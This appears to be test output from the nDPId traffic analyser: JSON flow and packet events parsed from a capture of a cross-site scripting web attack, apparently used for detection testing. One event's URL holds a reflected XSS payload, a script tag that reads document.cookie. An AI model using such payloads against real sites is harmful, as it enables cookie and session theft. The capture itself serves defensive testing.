-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347811525,"flow_last_seen":1499347816843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347812797,"flow_last_seen":1499347817844,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347812797,"flow_last_seen":1499347817844,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347814066,"flow_last_seen":1499347819845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347814066,"flow_last_seen":1499347819845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347743331,"flow_last_seen":1499347811268,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347939286,"flow_last_seen":1499347939286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347939286,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":1,"flow_last_seen":1499347939286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347939286,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86O9AAD4G3OCsEAABwKgKMoXmAFBSpnQtAAAAAKACchBz+wAAAgQFtAQCCAoBPJzCAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":2,"flow_last_seen":1499347939286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347939286,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQheYnhiyyUqZ0LqAScSCuhQAAAgQFtAQCCAoD5m42ATycwgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8064,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":3,"flow_last_seen":1499347939286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347939286,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06PBAAD4G3OesEAABwKgKMoXmAFBSpnQuJ4Yss4AQAOVNjQAAAQEICgE8nMID5m42"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347940593,"flow_last_seen":1499347940593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347940593,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":1,"flow_last_seen":1499347940593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347940593,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87cVAAD4G2AqsEAABwKgKMoX0AFCR9XPMAAAAAKACchAzuAAAAgQFtAQCCAoBPJ4JAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":2,"flow_last_seen":1499347940593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347940593,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhfTE5Ae8kfVzzaAScSD0kgAAAgQFtAQCCAoD5m99ATyeCQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8076,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":3,"flow_last_seen":1499347940594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347940594,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07cZAAD4G2BGsEAABwKgKMoX0AFCR9XPNxOQHvYAQAOWTmgAAAQEICgE8ngkD5m99"} 
-01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347939286,"flow_last_seen":1499347941874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347941874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27TNRH0PFRPCFVXECFZU2OUYBTDZQVIWB8HBZ1VC7EXA9PGMGBWA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8099,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347943146,"flow_last_seen":1499347943146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347943146,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8099,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":1,"flow_last_seen":1499347943146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347943146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TwNAAD4Gds2sEAABwKgKMoYOAFBjnu+EAAAAAKACchDjvgAAAgQFtAQCCAoBPKCHAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8100,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":2,"flow_last_seen":1499347943146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347943146,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhg4T7s6FY57vhaAScSCMRwAAAgQFtAQCCAoD5nH8ATyghwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8101,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":3,"flow_last_seen":1499347943147,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347943147,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TwRAAD4GdtSsEAABwKgKMoYOAFBjnu+FE+7OhoAQAOUrTgAAAQEICgE8oIgD5nH8"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347944440,"flow_last_seen":1499347944440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347944440,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":1,"flow_last_seen":1499347944440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347944440,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SUNAAD4GfI2sEAABwKgKMoYcAFB5iuiIAAAAAKACchDTfAAAAgQFtAQCCAoBPKHLAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8109,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":2,"flow_last_seen":1499347944440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347944440,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhhyVeGrjeYroiaAScSBc2gAAAgQFtAQCCAoD5nM\/ATyhywEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8110,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":3,"flow_last_seen":1499347944441,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347944441,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SURAAD4GfJSsEAABwKgKMoYcAFB5iuiJlXhq5IAQAOX74QAAAQEICgE8ocsD5nM\/"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347945720,"flow_last_seen":1499347945720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347945720,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":1,"flow_last_seen":1499347945720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347945720,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sjdAAD4GE5msEAABwKgKMoYqAFDdpBE8AAAAAKACchBFYQAAAgQFtAQCCAoBPKMLAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8118,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":2,"flow_last_seen":1499347945720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347945720,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhiqh1kGM3aQRPaAScSDqdwAAAgQFtAQCCAoD5nR\/ATyjCwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8119,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":3,"flow_last_seen":1499347945721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347945721,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sjhAAD4GE6CsEAABwKgKMoYqAFDdpBE9odZBjYAQAOWJfwAAAQEICgE8owsD5nR\/"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347815351,"flow_last_seen":1499347820846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347815351,"flow_last_seen":1499347820846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347816657,"flow_last_seen":1499347821846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33002,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347816657,"flow_last_seen":1499347821846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33002,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347819250,"flow_last_seen":1499347824846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33028,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347819250,"flow_last_seen":1499347824846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33028,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347820510,"flow_last_seen":1499347825848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33042,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347820510,"flow_last_seen":1499347825848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347823117,"flow_last_seen":1499347828846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33068,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347823117,"flow_last_seen":1499347828846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33068,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347824426,"flow_last_seen":1499347829847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33082,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347824426,"flow_last_seen":1499347829847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33082,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347948293,"flow_last_seen":1499347948293,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347948293,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":1,"flow_last_seen":1499347948293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347948293,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EvlAAD4GstesEAABwKgKMoZEAFDGn7d3AAAAAKACchCzjQAAAgQFtAQCCAoBPKWOAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":2,"flow_last_seen":1499347948293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347948293,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhkRGWOs1xp+3eKAScSAH9gAAAgQFtAQCCAoD5ncCATyljgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":3,"flow_last_seen":1499347948294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347948294,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EvpAAD4Gst6sEAABwKgKMoZEAFDGn7d4RljrNoAQAOWm\/QAAAQEICgE8pY4D5ncC"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8148,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347949587,"flow_last_seen":1499347949587,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347949587,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8148,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":1,"flow_last_seen":1499347949587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347949587,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QMNAAD4GhQ2sEAABwKgKMoZSAFBj7eYSAAAAAKACchDmUwAAAgQFtAQCCAoBPKbRAAAAAAEDAwc="} 